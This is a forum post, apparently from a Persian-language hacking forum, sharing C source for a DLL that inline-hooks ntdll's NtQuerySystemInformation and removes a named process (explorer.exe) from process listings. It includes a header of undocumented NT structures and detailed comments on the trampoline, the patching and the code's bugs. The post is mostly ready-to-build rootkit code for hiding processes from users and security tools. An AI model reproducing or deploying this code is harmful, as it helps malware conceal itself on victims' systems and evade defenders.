
مخفی کردن برنامه در پروسه با زبان سی

[c] Process Hiding
Author: stdio

I didn't really see a good C example, so I decided to share my DLL that hooks NtQuerySystemInformation and hides explorer.exe.

کد:
#include <Windows.h>
#include "sysinfo.h"

/* The first 5 bytes of ntdll!NtQuerySystemInformation, saved by PlaceHook()
 * so that the trampoline can execute them and UnHook() can restore them.
 * Holds nothing meaningful until PlaceHook() has run. */
BYTE OrigBytes[5];
/* Image name that the hook removes from SystemProcessInformation results.
 * Compared against ProcessName.Buffer with lstrcmpW, i.e. an exact,
 * case-sensitive match of the whole name. */
WCHAR g_TargetProc[] = L"explorer.exe";

/*
 * Trampoline ("stub") that PlaceHook() rewrites in place so the hook can
 * still reach the real NtQuerySystemInformation after its entry has been
 * overwritten with a JMP.  Declared naked: no prologue/epilogue is emitted,
 * the body is exactly the bytes of the three instructions below.
 *
 * Layout after PlaceHook() has patched it:
 *   offset 0..4   `mov eax, 0dfh`   5-byte placeholder, overwritten with the
 *                                   export's original first 5 bytes (OrigBytes)
 *   offset 5..9   `mov ecx, imm32`  the imm32 at offset 6 is overwritten with
 *                                   (export address + 5)
 *   offset 10..11 `jmp ecx`         resumes the export after the displaced bytes
 *
 * 0xcafebabe is only a placeholder and is never executed as an address.
 * This only works if the export starts with an instruction sequence that is
 * exactly 5 bytes long and still valid when copied elsewhere (no relative
 * operands); that holds for some 32-bit ntdll builds only.  MSVC `__asm`
 * blocks are x86-only, so this file does not build for x64.
 */
__declspec(naked) NTSTATUS NTAPI  OriginalNtQuerySystemInformation(
        IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
        IN OUT PVOID SystemInformation,
        IN ULONG SystemInformationLength,
        OUT PULONG ReturnLength OPTIONAL
    )
{
    __asm
    {
        mov eax, 0dfh // 5-byte placeholder; PlaceHook() overwrites it with the export's original 5 bytes
        mov ecx, 0xcafebabe // placeholder imm32 (at stub offset 6); PlaceHook() overwrites it with export + 5
        jmp ecx            
    }
}

/*
 * Replacement for NtQuerySystemInformation that PlaceHook() redirects the
 * ntdll export to.
 *
 * Every call is forwarded to the trampoline first.  For
 * SystemProcessInformation only, the returned singly linked list of
 * SYSTEM_PROCESSES records is then walked and any record whose ProcessName
 * equals g_TargetProc is spliced out by adding its NextEntryDelta to the
 * predecessor's delta.  The buffer contents and ReturnLength are otherwise
 * passed through untouched, so the hidden record still occupies space in the
 * buffer and is still counted in ReturnLength.
 *
 * Result is not checked before the buffer is walked; if the call did not
 * succeed, SystemInformation may not contain a well-formed list and the walk
 * below can fault inside the hooked process.
 *
 * The hook is purely user-mode and per-process: enumeration that does not go
 * through this process's patched ntdll (another process, kernel-mode tooling,
 * a direct system call) is unaffected, and comparing the first bytes of the
 * ntdll export against the on-disk image exposes the 0xE9 JMP that
 * PlaceHook() writes.
 */
NTSTATUS NTAPI HookedNtQuerySystemInformation(
        IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
        IN OUT PVOID SystemInformation,
        IN ULONG SystemInformationLength,
        OUT PULONG ReturnLength OPTIONAL
    )
{
    NTSTATUS Result;
    PSYSTEM_PROCESSES pSystemProcess;       // current record (the one whose link may be rewritten)
    PSYSTEM_PROCESSES pNextSystemProcess;   // record being examined for a name match

    // Always let the real function fill the buffer first.
    Result = OriginalNtQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);

    switch(SystemInformationClass)
    {

        case SystemProcessInformation:
            
            pSystemProcess = (PSYSTEM_PROCESSES)SystemInformation;
            pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);

            // NextEntryDelta is a byte offset to the next record; 0 marks the last one.
            while(pNextSystemProcess->NextEntryDelta != 0)
            {
                if (lstrcmpW((&pNextSystemProcess->ProcessName)->Buffer,g_TargetProc)==0){
                    // Unlink the matching record: predecessor now skips over it.
                    pSystemProcess->NextEntryDelta += pNextSystemProcess->NextEntryDelta;
                }
                pSystemProcess = pNextSystemProcess;
                pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
            }
            break;

    }

    return Result;

}


/*
 * Installs an inline 5-byte JMP hook on ntdll!NtQuerySystemInformation in the
 * current process and turns OriginalNtQuerySystemInformation into a
 * trampoline to the displaced code.
 *
 * Returns 0 on success, 1 when the export cannot be resolved.
 *
 * Steps:
 *   1. Resolve the export and save its first 5 bytes into OrigBytes.
 *      NOTE: the copy is performed before the NULL check that follows it, so
 *      a failed lookup dereferences NULL instead of returning 1.
 *   2. Patch the stub: OrigBytes at offset 0, and the imm32 of its `mov ecx`
 *      (offset 6) set to export + 5, the first instruction after the
 *      displaced bytes.
 *   3. Patch the export: 0xE9 (JMP rel32) plus the displacement from the end
 *      of that JMP to HookedNtQuerySystemInformation.
 *
 * All VirtualProtect return values are ignored.  The rel32 field is written
 * through an LPVOID*, i.e. sizeof(LPVOID) bytes, which is only the intended
 * 4 bytes on 32-bit builds.  GetModuleHandle is passed a narrow literal and so
 * only compiles in a non-UNICODE build.  No synchronization is used: another
 * thread can execute the export while its first bytes are half-written.
 */
DWORD PlaceHook()
{
    DWORD oldProtect;
    LPVOID sourceFunction;   // ntdll export being hooked
    LPVOID destFunction;     // hook function the export will jump to
    LPVOID stubFunction;     // trampoline rewritten in place

    destFunction = HookedNtQuerySystemInformation;
    stubFunction = OriginalNtQuerySystemInformation;

    sourceFunction = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
      CopyMemory(OrigBytes,sourceFunction,sizeof(BYTE)*5); // reads through sourceFunction before it is checked below

    if(sourceFunction == NULL){
        return 1;
    }
    
    // PatchStub: displaced bytes at offset 0, resume address at offset 6 (imm32 of `mov ecx`)
    VirtualProtect(stubFunction, 9, PAGE_EXECUTE_READWRITE, &oldProtect);
    CopyMemory(stubFunction,OrigBytes,sizeof(BYTE)*5);
    *(LPVOID*)((LPBYTE)stubFunction + 6) = ((LPBYTE)sourceFunction + 5);
    VirtualProtect(stubFunction, 9, oldProtect, &oldProtect);

    //PatchSource: 0xE9 + rel32, displacement measured from the byte after the 5-byte JMP
    VirtualProtect(sourceFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
    *(LPBYTE)sourceFunction = 0xE9;
    *(LPVOID *)((LPBYTE)sourceFunction + 1) = (LPVOID)((LPBYTE)destFunction - ((LPBYTE)sourceFunction + 5));
    VirtualProtect(sourceFunction, 5, oldProtect, &oldProtect);
    
    return 0;
}

/*
 * Removes the hook by writing OrigBytes back over the first 5 bytes of
 * ntdll!NtQuerySystemInformation.
 *
 * Does not check that the export resolved (addr may be NULL) or that
 * PlaceHook() ever succeeded, and ignores the VirtualProtect results; the
 * stub itself is left in its patched state.  Same narrow-literal
 * GetModuleHandle call as PlaceHook(), so non-UNICODE builds only.
 */
void UnHook()
{
    DWORD    oldProtect;

    LPVOID addr = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
    VirtualProtect(addr, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
    CopyMemory(addr,OrigBytes,sizeof(BYTE)*5); // restore the displaced bytes saved by PlaceHook()
    VirtualProtect(addr, 5, oldProtect, &oldProtect);
}



/*
 * DLL entry point: installs the hook when the DLL is loaded into a process
 * and removes it when the DLL is unloaded.
 *
 * The first parameter is declared as HANDLE; the documented signature uses
 * HINSTANCE.  PlaceHook()'s return value is ignored and TRUE is returned
 * unconditionally, so the DLL stays loaded even when hooking failed.
 * DLL_THREAD_ATTACH/DETACH and lpvReserved are not used.
 */
BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD dwReason, LPVOID lpvReserved){
    
    switch (dwReason){

        case DLL_PROCESS_ATTACH:
            PlaceHook(); // failure (return 1) is not reported
            break;
        case DLL_PROCESS_DETACH:
            UnHook();
            break;
    }

    return TRUE;
}
and the header:

کد:
#ifndef __SYSINFO_H__
#define __SYSINFO_H__

/* This header relies on Windows.h having been included first (LONG, USHORT,
 * PWSTR, SIZE_T, LARGE_INTEGER, IO_COUNTERS, NTAPI).  NTSTATUS is defined
 * here as a macro, not a typedef; the #ifndef only guards against another
 * *macro* of that name, so it presumably clashes with headers that typedef
 * NTSTATUS (e.g. the SDK's NT headers) — confirm before including both. */
#ifndef NTSTATUS
#define NTSTATUS LONG
#endif

#define NT_SUCCESS(x) ((x) >= 0)   /* NT convention: non-negative status codes are successes */
#define STATUS_SUCCESS    0x00000000

/* Information classes accepted by NtQuerySystemInformation.  Values are
 * positional (first enumerator is 0), so SystemProcessInformation == 5; that
 * is the only class the hook dispatches on.  The remaining names are carried
 * along for completeness and are not used by the hook. */
typedef enum _SYSTEM_INFORMATION_CLASS {

SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemPathInformation,
SystemProcessInformation,   /* = 5: returns the SYSTEM_PROCESSES list walked by the hook */
SystemCallCountInformation,
SystemDeviceInformation,
SystemProcessorPerformanceInformation,
SystemFlagsInformation,
SystemCallTimeInformation,
SystemModuleInformation,
SystemLocksInformation,
SystemStackTraceInformation,
SystemPagedPoolInformation,
SystemNonPagedPoolInformation,
SystemHandleInformation,
SystemObjectInformation,
SystemPageFileInformation,
SystemVdmInstemulInformation,
SystemVdmBopInformation,
SystemFileCacheInformation,
SystemPoolTagInformation,
SystemInterruptInformation,
SystemDpcBehaviorInformation,
SystemFullMemoryInformation,
SystemLoadGdiDriverInformation,
SystemUnloadGdiDriverInformation,
SystemTimeAdjustmentInformation,
SystemSummaryMemoryInformation,
SystemNextEventIdInformation,
SystemEventIdsInformation,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemExtendServiceTableInformation,
SystemPrioritySeperation,
SystemPlugPlayBusInformation,
SystemDockInformation,
SystemPowerInformation1,
SystemProcessorSpeedInformation,
SystemCurrentTimeZoneInformation,
SystemLookasideInformation

} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;

/* Counted UTF-16 string as used by the NT native API.  Length and
 * MaximumLength are byte counts, and Buffer is not guaranteed to be
 * NUL-terminated by this definition alone; the hook nevertheless passes
 * Buffer straight to lstrcmpW, which expects a terminated string. */
typedef struct _LSA_UNICODE_STRING {
    USHORT Length;          /* bytes in use */
    USHORT MaximumLength;   /* bytes allocated */
    PWSTR  Buffer;
}LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;

/* Note: CONST applies to the pointer itself here (PUNICODE_STRING const), not
 * to the pointed-to string. */
typedef CONST PUNICODE_STRING PCUNICODE_STRING;

typedef LONG KPRIORITY;

/* Per-process memory counters embedded in SYSTEM_PROCESSES.  Only their size
 * matters to the hook (they fix the offset of the fields after them);
 * SIZE_T makes this struct pointer-size dependent. */
typedef struct _VM_COUNTERS {
SIZE_T PeakVirtualSize;
SIZE_T VirtualSize;
ULONG PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
} VM_COUNTERS;

/* Process/thread id pair.  Declared here with 32-bit DWORD members, which
 * matches the x86-only assumptions made elsewhere in this code. */
typedef struct _CLIENT_ID {
DWORD UniqueProcess;
DWORD UniqueThread;
} CLIENT_ID;

/* Per-thread record that follows each SYSTEM_PROCESSES header (ThreadCount
 * of them).  Not inspected by the hook; the hook moves between process
 * records using NextEntryDelta rather than by counting these. */
typedef struct _SYSTEM_THREADS {
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientId;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
LONG State;
LONG WaitReason;
} SYSTEM_THREADS, * PSYSTEM_THREADS;

/* One record of the variable-length list returned for
 * SystemProcessInformation.  The hook depends on exactly two things here:
 * NextEntryDelta at offset 0 (byte distance to the next record, 0 for the
 * last one) and the position of ProcessName.  Every field before ProcessName
 * must therefore match the undocumented layout of the Windows build being
 * targeted; the Reserved1/Reserved2 members are only padding from this
 * header's point of view — their real meaning is not established here. */
typedef struct _SYSTEM_PROCESSES {
        ULONG NextEntryDelta;        /* byte offset to the next record; 0 terminates the list */
        ULONG ThreadCount;           /* number of SYSTEM_THREADS that follow this header */
        ULONG Reserved1[6];
        LARGE_INTEGER CreateTime;
        LARGE_INTEGER UserTime;
        LARGE_INTEGER KernelTime;
        UNICODE_STRING ProcessName;  /* image name compared against g_TargetProc */
        KPRIORITY BasePriority;
        ULONG ProcessId;
        ULONG InheritedFromProcessId;
        ULONG HandleCount;
        ULONG Reserved2[2];
        VM_COUNTERS VmCounters;
        IO_COUNTERS IoCounters;      /* from Windows.h */
        SYSTEM_THREADS Threads[1];   /* first of ThreadCount trailing thread records */
    } SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;



/* Function-pointer type matching NtQuerySystemInformation's prototype.
 * Not referenced by the hook source above (it calls the naked stub directly).
 * The name begins with a double underscore, which is reserved for the
 * implementation; the same applies to the __SYSINFO_H__ include guard. */
typedef NTSTATUS (NTAPI *__NtQuerySystemInformation)(
        IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
        IN OUT PVOID SystemInformation,
        IN ULONG SystemInformationLength,
        OUT PULONG ReturnLength OPTIONAL
    );

#endif